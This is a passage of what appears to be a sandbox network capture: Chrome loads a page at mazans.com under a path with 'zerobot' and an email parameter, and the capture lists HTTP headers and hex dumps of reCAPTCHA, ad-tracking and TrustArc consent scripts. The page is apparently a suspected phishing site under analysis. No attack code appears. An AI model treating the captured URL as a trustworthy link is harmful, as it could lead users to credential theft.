                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          36192.168.2.1749817172.217.18.44436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC499OUTGET /recaptcha/api.js?render=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC629INData Raw: 35 62 63 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 5bc/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC846INData Raw: 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: V+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.coo
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          37192.168.2.1749818185.89.210.1224436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC541OUTGET /getuidj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: secure.adnxs.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC971INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, private
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                                          AN-X-Request-Uuid: 792b4ccf-a5ae-4e59-ae21-0727e73f3dbe
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Wed, 01-Nov-2034 16:29:13 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                                                                                                                                                                                                                          X-Proxy-Origin: 173.254.250.82; 173.254.250.82; 954.bm-nginx-loadbalancer.mgmt.ams3.adnexus.net; adnxs.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC11INData Raw: 7b 22 75 69 64 22 3a 22 30 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"uid":"0"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          38192.168.2.174982513.225.78.574436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC565OUTGET /asset/notice.js/v/v1.7-776 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC581INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 96983
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 13 Nov 2024 02:26:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: public
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:25:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 e5b93012e2bfb81dc9846f43efd610a6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: l-bTI7PuXvkSpETjf-FvVudjbqF5ZMkwcAW8ceiZdIlPHNpje3s61Q==
                                                                                                                                                                                                                                                                                                                                                                          Age: 365
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC15803INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 74 72 75 73 74 65 5f 65 75 28 29 7b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 76 61 72 20 67 3d 74 72 75 73 74 65 2e 65 75 2e 62 69 6e 64 4d 61 70 3b 67 2e 66 65 61 74 2e 69 73 43 6f 6e 73 65 6e 74 52 65 74 72 69 65 76 65 64 3d 67 2e 66 65 61 74 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 3f 67 2e 66 65 61 74 2e 69 73 43 6f 6e 73 65 6e 74 52 65 74 72 69 65 76 65 64 3a 21 30 3b 69 66 28 21 75 2e 64 6f 6e 65 26 26 74 72 75 73 74 65 2e 75 74 69 6c 2e 69 73 43 6f 6e 73 65 6e 74 52 65 73 6f 6c 76 65 64 28 29 29 7b 75 2e 64 6f 6e 65 3d 21 30 3b 76 61 72 20 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 63 3d 74 72 75 73 74 65 2e 75 74 69 6c 2e 72 65 61 64 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function _truste_eu(){function u(){var g=truste.eu.bindMap;g.feat.isConsentRetrieved=g.feat.crossDomain?g.feat.isConsentRetrieved:!0;if(!u.done&&truste.util.isConsentResolved()){u.done=!0;var k=function(){var a=(new Date).getTime(),c=truste.util.readCooki
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 65 28 61 2c 63 2e 76 61 6c 75 65 2c 66 2e 74 6f 53 74 72 69 6e 67 28 29 2c 21 30 29 7d 65 6c 73 65 20 74 72 75 73 74 65 2e 75 74 69 6c 2e 63 72 65 61 74 65 43 6f 6f 6b 69 65 28 61 2c 64 29 3b 63 3d 64 7d 72 65 74 75 72 6e 20 63 7d 3b 74 72 75 73 74 65 2e 75 74 69 6c 2e 73 61 6d 65 73 69 74 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 76 61 72 20 62 3b 0a 62 3d 28 62 3d 52 65 67 45 78 70 28 22 55 43 42 72 6f 77 73 65 72 5b 2f 5d 22 2c 22 69 67 22 29 2e 65 78 65 63 28 61 29 29 26 26 62 2e 6c 65 6e 67 74 68 3f 21 30 3a 21 31 3b 69 66 28 62 29 7b 76 61 72 20 63 3d 52 65 67 45 78 70 28 22 55 43 42 72 6f 77 73 65 72 5b 2f 5d 28 5c 5c 64 2b 29 5b 2e 5d 28 5c 5c 64 2b 29 5b 2e 5d 28 5c 5c 64 2b 29 5b 2e 5c 5c 64 5d 2a 20 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e(a,c.value,f.toString(),!0)}else truste.util.createCookie(a,d);c=d}return c};truste.util.samesite=function(a){function b(a){var b;b=(b=RegExp("UCBrowser[/]","ig").exec(a))&&b.length?!0:!1;if(b){var c=RegExp("UCBrowser[/](\\d+)[.](\\d+)[.](\\d+)[.\\d]* "
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 6f 74 69 63 65 46 6c 6f 77 3f 74 72 75 73 74 65 2e 65 75 2e 63 70 72 61 2e 6e 6f 28 61 2e 63 70 72 61 43 6f 6e 73 65 6e 74 2c 61 2e 63 70 72 61 53 6f 75 72 63 65 29 3a 74 72 75 73 74 65 2e 65 75 2e 63 70 72 61 2e 64 72 6f 70 43 70 72 61 43 6f 6f 6b 69 65 28 21 31 29 2c 74 72 75 73 74 65 2e 65 75 2e 68 69 64 65 43 6c 6f 73 65 42 75 74 74 6f 6e 28 21 31 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 68 69 64 65 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 22 3a 74 72 75 73 74 65 2e 65 75 2e 68 69 64 65 43 6c 6f 73 65 42 75 74 74 6f 6e 28 21 30 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 66 69 6e 69 73 68 65 64 5f 6f 70 74 5f 6f 75 74 22 3a 74 72 75 73 74 65 2e 75 74 69 6c 2e 74 72 61 63 65 28 22 61 75 74 6f 20 6f 70 74 20 6f 75 74 20 70 72 6f 63 65 73 73 20 66 69 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: oticeFlow?truste.eu.cpra.no(a.cpraConsent,a.cpraSource):truste.eu.cpra.dropCpraCookie(!1),truste.eu.hideCloseButton(!1));break;case "hide_close_button":truste.eu.hideCloseButton(!0);break;case "finished_opt_out":truste.util.trace("auto opt out process fin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 2c 73 65 6c 66 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 29 29 2c 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 70 29 2c 70 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 29 2c 70 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 29 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 62 3d 73 65 6c 66 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6f 62 6a 65 63 74 22 29 2c 68 3d 62 2e 6c 65 6e 67 74 68 3b 30 3c 68 2d 2d 3b 29 7b 76 61 72 20 6e 3d 62 5b 68 5d 3b 6e 26 26 28 6e 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 74 72 75 73 74 65 5f 68 69 64 64 65 6e 22 29 7d 7d 63 61 74 63 68 28 71 29 7b 7d 74 72 75 73 74 65 2e 65 75 2e 61 64 64 43 6c 6f 73 65 42 75 74 74 6f 6e 28 61 2c 22 69 72 6d 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ,self.document.body.appendChild(r)),l.appendChild(p),p.appendChild(r),p.appendChild(c));try{for(var b=self.document.getElementsByTagName("object"),h=b.length;0<h--;){var n=b[h];n&&(n.className+=" truste_hidden")}}catch(q){}truste.eu.addCloseButton(a,"irm"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 69 63 6f 6e 52 6f 6c 65 3f 61 2e 69 63 6f 6e 52 6f 6c 65 3a 22 6c 69 6e 6b 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 61 6e 67 22 2c 61 2e 6c 61 6e 67 75 61 67 65 29 3b 74 72 75 73 74 65 2e 75 74 69 6c 2e 61 64 64 4c 69 73 74 65 6e 65 72 28 62 2c 22 6b 65 79 64 6f 77 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 7c 7c 28 61 3d 77 69 6e 64 6f 77 2e 65 76 65 6e 74 29 3b 76 61 72 20 63 3d 61 2e 77 68 69 63 68 7c 7c 61 2e 6b 65 79 43 6f 64 65 3b 69 66 28 31 33 3d 3d 63 7c 7c 33 32 3d 3d 0a 63 29 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3a 65 76 65 6e 74 2e 72 65 74 75 72 6e 56 61 6c 75 65 3d 21 31 2c 62 2e 63 6c 69 63 6b 28 29 7d 29 3b 62 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: iconRole?a.iconRole:"link");b.setAttribute("lang",a.language);truste.util.addListener(b,"keydown",function(a){a||(a=window.event);var c=a.which||a.keyCode;if(13==c||32==c)a.preventDefault?a.preventDefault():event.returnValue=!1,b.click()});b.style.cursor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC15644INData Raw: 28 61 29 29 72 65 74 75 72 6e 7b 65 72 72 6f 72 3a 22 43 61 6c 6c 20 69 73 20 6d 69 73 73 69 6e 67 20 72 65 71 75 69 72 65 64 20 70 61 72 61 6d 65 74 65 72 73 20 6f 72 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 22 7d 3b 74 68 69 73 2e 74 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 44 6f 69 6e 67 20 41 50 49 20 43 61 6c 6c 22 2c 41 72 72 61 79 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 29 3b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 67 65 74 43 6f 6e 73 65 6e 74 22 3a 76 61 72 20 64 3d 28 61 72 67 75 6d 65 6e 74 73 5b 32 5d 7c 7c 63 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 2e 3f 2f 2c 22 2e 22 29 2c 65 3d 74 68 69 73 2e 67 65 74 41 75 74 68 6f 72 69 74 79 4c 65 76 65 6c 28 64 2c 28 74 68
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (a))return{error:"Call is missing required parameters or not allowed"};this.tconsole.log("Doing API Call",Array.apply(null,arguments));switch(a){case "getConsent":var d=(arguments[2]||c.location.hostname).replace(/^\.?/,"."),e=this.getAuthorityLevel(d,(th


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          39192.168.2.174982613.225.78.574436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC736OUTGET /log?domain=sendgrid.com&country=us&state=&behavior=implied&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&c=a562&referer=https://mazans.com&language=en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 590590f04f79f692591f9db0e720a31c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: BTQrOphvGbgWtRXxloeD4ZOgIMc1bGu92iyZZ9Py2KOHa0Mh6jW0vQ==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          40192.168.2.174983013.225.78.534436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
